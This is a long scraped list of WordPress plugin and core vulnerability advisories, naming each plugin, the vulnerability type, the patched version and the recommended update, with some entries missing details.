Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.18
Recommended Action: Update to version 1.6.18, or a newer patched version

Plugin: google-analytics-dashboard

Plugin: Passwords Manager

Vulnerability: Cross-Site Scripting via pwdms_csv_category parameter
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Easy Accordion – Responsive Accordion FAQ Builder and Product FAQ

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Plugin: Shared Files – Frontend File Upload Form & Secure File Sharing

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Event Banner

Plugin: Kish Guest Posting

Vulnerability: Arbitrary File Upload
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘ucss_connect’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: WP Debugging

Vulnerability: Unauthenticated Plugin Settings Update
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: TDO Mini Forms

Plugin: User Access Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: AdPlugg WordPress Ad Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.34
Recommended Action: Update to version 1.1.34, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.11.2
Recommended Action: Update to version 1.11.2, or a newer patched version

Plugin: Avada (Fusion) Builder

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: WPFactory Helper

Vulnerability: Reflected Cross-Site Scripting via item_slug
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WooCommerce Wishlist (High customization, fast setup,Free Elementor Wishlist, most features)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Plausible Analytics

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: WP Post Styling

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Easy Calendar

Plugin: Simple 301 Redirects – Addon – Bulk Uploader

Vulnerability: Missing Authorization
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Portfolio – WordPress Portfolio Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.11
Recommended Action: Update to version 2.8.11, or a newer patched version

Plugin: Video Lessons Manager – WordPress LMS Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Login Lockdown & Protection

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.07
Recommended Action: Update to version 2.07, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Reservation.Studio widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Dragfy Addons for Elementor

Vulnerability: Missing Authorization via save_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Style Kits – Advanced Theme Styles for Elementor

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: BackupBuddy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.8.3
Recommended Action: Update to version 8.8.3, or a newer patched version

Plugin: Realteo

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: WP Data Access – App, Table, Form and Chart Builder plugin

Vulnerability: Admin+ SQL Injection
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: WP Google Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 11.8
Recommended Action: Update to version 11.8, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Missing Authorization to Arbitrary Shortcode Execution via userpro_shortcode_template
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: SendGrid

Plugin: SMTP2GO for WordPress – Email Made Easy

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: WPCargo Track & Trace

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.9.5
Recommended Action: Update to version 6.9.5, or a newer patched version

Plugin: AddToAny Share Buttons

Vulnerability: HTTP Host Header Injection
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: Google Maps

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting via Import Tool
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: Content Grabber

Plugin: Grab & Save

Plugin: Shibboleth

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: GD Security Headers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Core: WordPress

Vulnerability: Authorization Bypass to Term Disclosure
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: WPCB

Core: WordPress

Vulnerability: Reflected Cross Site Scripting
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Flexi Quote Rotator

Plugin: Simple Membership

Vulnerability: Privilege escalation via Registration
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: Banner Management For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Age Gate

Vulnerability: Open Redirect
Patched Version: 2.13.5
Recommended Action: Update to version 2.13.5, or a newer patched version

Plugin: Custom Order Numbers for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 3.9.9
Recommended Action: Update to version 3.9.9, or a newer patched version

Plugin: Birthdays Widget

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Missing Authorization to Initial Page Creation
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via userpro_save_userdata
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Easy Affiliate Links

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Settings
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Missing Authorization
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 4.1.4
Recommended Action: Update to version 4.1.4, or a newer patched version

Plugin: Schedule Posts Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery to Plugin De-Installation
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Limit Login Attempts (Spam Protection)

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Yoast SEO: Local

Vulnerability: Cross-Site Request Forgery
Patched Version: 14.9
Recommended Action: Update to version 14.9, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 7.95
Recommended Action: Update to version 7.95, or a newer patched version

Plugin: WDContactFormBuilder

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 1.0.25
Recommended Action: Update to version 1.0.25, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Tutor Instructor+) SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Scripting via Shortcodes
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Theme Image Change
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Missing Authorization via wpas_load_reply_history
Patched Version: 6.1.6
Recommended Action: Update to version 6.1.6, or a newer patched version

Plugin: 123ContactForm for WordPress

Vulnerability: Arbitrary Post Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Authorizer

Vulnerability: Service Hostname Discovery Exploitation
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Multiple Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.18
Recommended Action: Update to version 1.3.18, or a newer patched version

Plugin: js-restaurant

Plugin: Custom 404 Pro

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: MF Gig Calendar

Vulnerability: Authenticated(Contributor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Users Exporter

Plugin: Real3D Flipbook

Vulnerability: File Upload to User Controlled Location
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: heat-trackr

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.01
Recommended Action: Update to version 1.01, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 21.1.2.1
Recommended Action: Update to version 21.1.2.1, or a newer patched version

Plugin: Claptastic Clap! Button

Plugin: EZ Portfolio (Unmaintained)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Google Analytics Counter Tracker

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: BackupBuddy

Vulnerability: Authentication Bypass
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Lightbox Plus

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.3.0
Recommended Action: Update to version 5.2.3.0, or a newer patched version

Plugin: amtyThumb

Plugin: Theme Tweaker

Plugin: Cryptocurrency Pricing list and Ticker

Plugin: Customize WordPress Emails and Alerts – Better Notifications for WP

Vulnerability: Cross-Site Request Forgery via handle_actions
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Print Invoice & Delivery Notes for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: WebToffee WP Backup and Migration

Vulnerability: Missing Authorization to Settings Update
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.2.8
Recommended Action: Update to version 7.2.8, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: SQL Injection
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: TemplatesNext ToolKit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Easy Media Download

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Easy Social Feed – Social Photos Gallery – Post Feed – Like Box

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Comments
Patched Version: 3.7.8
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.8, 3.8.8, 3.9.6, 4.0.5, 4.1.5, 4.2.2

Plugin: Web Push Notifications – Webpushr

Vulnerability: Missing Authorization to Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.35.0
Recommended Action: Update to version 4.35.0, or a newer patched version

Plugin: Bonuspressx

Plugin: Timesheet by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.5
Recommended Action: Update to version 0.1.5, or a newer patched version

Plugin: LinkWorth Plugin

Vulnerability: Cross-Site Request Forgery to Plugin Setting Update
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: Showing URL in QR Code

Plugin: Travelpayouts: All Travel Brands in One Place

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.29
Recommended Action: Update to version 1.10.29, or a newer patched version

Plugin: Publish to Schedule

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: wp image slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: Poll | Vote | Contest – Best Poll Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: WP EXtra

Vulnerability: Cross-Site Request Forgery ToolImport
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Core: WordPress

Vulnerability: Content-Spoofing Attacks
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Social Media Follow Buttons Bar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: SQL injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: User Location and IP

Plugin: PHP Everywhere

Vulnerability: Authenticated (Contributor+) Remote Code Execution via Metabox
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Debug Log Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Web and WooCommerce Addons for WPBakery Builder

Vulnerability: Missing Authorization Checks
Patched Version: 1.4.4.2
Recommended Action: Update to version 1.4.4.2, or a newer patched version

Plugin: Online Booking & Scheduling Calendar for WordPress by vcita

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber – MailOptin

Vulnerability: Authenticated (Admin+) Cross Site Scripting
Patched Version: 1.2.54.1
Recommended Action: Update to version 1.2.54.1, or a newer patched version

Plugin: WP SVG Icons

Plugin: 301 Redirects – Easy Redirect Manager

Vulnerability: Easy Redirect Manager < 2.51
Patched Version: 2.51
Recommended Action: Update to version 2.51, or a newer patched version

Plugin: WP-EMail

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.69.1
Recommended Action: Update to version 2.69.1, or a newer patched version

Plugin: Allow svg files

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Appointments

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: YITH WooCommerce Product Add-Ons

Vulnerability: Missing Authorization
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: Predictive Search for WooCommerce

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 5.8.1
Recommended Action: Update to version 5.8.1, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Install and Activation
Patched Version: 3.6.4.2
Recommended Action: Update to version 3.6.4.2, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.30
Recommended Action: Update to version 1.8.30, or a newer patched version

Plugin: Simple File List

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 6.1.10
Recommended Action: Update to version 6.1.10, or a newer patched version

Plugin: YOP Poll

Vulnerability: Author+ Stored Cross-Site Scripting via Options Module
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: YITH WooCommerce Product Add-Ons

Vulnerability: Authenticated(Shop Manager+) PHP Object Injection
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Woo Custom Emails

Vulnerability: Missing Authorization to Unauthenticated Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Formzu WP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via id
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: YAWPP (Yet Another WordPress Petition Plugin)

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘accept_other_payment_methods’, ‘other_payment_methods’ Parameters
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Gravitate QA Tracker

Vulnerability: Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP MapIt

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.1.1
Recommended Action: Update to version 2.7.1.1, or a newer patched version

Plugin: Editorial Calendar

Vulnerability: Authenticated (Contributor+) Insecure Direct Object Reference
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Easy Social Box / Page Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Sitekit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘sitekit_iframe ‘ shortcode
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Missing Authorization in check_score
Patched Version: 1.15.17
Recommended Action: Update to version 1.15.17, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Reflected Cross-Site Scripting via postid
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Spreadshop Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Tainacan

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.20.5
Recommended Action: Update to version 0.20.5, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Code Injection
Patched Version: 6.5.3
Recommended Action: Update to version 6.5.3, or a newer patched version

Plugin: Better Search TMC

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 6.2.04
Recommended Action: Update to version 6.2.04, or a newer patched version

Plugin: CBX Petition for WordPress

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.70
Recommended Action: Update to version 3.0.70, or a newer patched version

Plugin: Availability Calendar

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Cancel order request / Return order / Repeat Order / Reorder for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Authenticator

Vulnerability: Missing Authorization
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Find and Replace All

Plugin: Livefyre Comments 3

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Delete All Comments Easily

Vulnerability: All Comments Deletion via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom TinyMCE Shortcode Button

Plugin: Donations Made Easy – Smart Donations

Plugin: Single Post Exporter

Plugin: Forms by CaptainForm – Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting via REQUEST_URI
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking and Scheduling Calendar Plugin – Webba Booking

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.2.22
Recommended Action: Update to version 4.2.22, or a newer patched version

Plugin: Stripe for WooCommerce

Vulnerability: 3.3.9
Patched Version: 3.3.10
Recommended Action: Update to version 3.3.10, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Click To Tweet

Plugin: Auto Affiliate Links

Vulnerability: Authenticated (Subscriber+) Plugin Settings Change
Patched Version: 6.2.1.6
Recommended Action: Update to version 6.2.1.6, or a newer patched version

Plugin: Spam Free WordPress

Vulnerability: IP Protection Bypass
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Settings and User Data Export
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Client Dash

Plugin: Advanced Image Sitemap

Plugin: WordPrezi

Vulnerability: Authenticated (Contributor+) Strored Cross-Site Scripting via Shortcode
Patched Version: 0.9
Recommended Action: Update to version 0.9, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.22.10
Recommended Action: Update to version 4.22.10, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 2.26.0
Recommended Action: Update to version 2.26.0, or a newer patched version

Plugin: HC Custom WP-Admin URL

Vulnerability: Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bootstrap Shortcodes

Plugin: Conditional Checkout Fields & Edit Checkout Fields for WooCommerce

Plugin: FastDup – Fastest WordPress Migration & Duplicator

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Responsive Pricing Table

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Awesome Filterable Portfolio

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Export Users to CSV

Plugin: Video Gallery – YouTube Gallery and Vimeo Gallery

Vulnerability: Missing Authorization
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Carts Guru

Vulnerability: PHP Object Injection
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: AceIDE

Vulnerability: Authenticated (Admin+) Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SlimStat Analytics

Vulnerability: Unauthenticated Stored Cross-Site Scripting from Visitors
Patched Version: 4.8.1
Recommended Action: Update to version 4.8.1, or a newer patched version

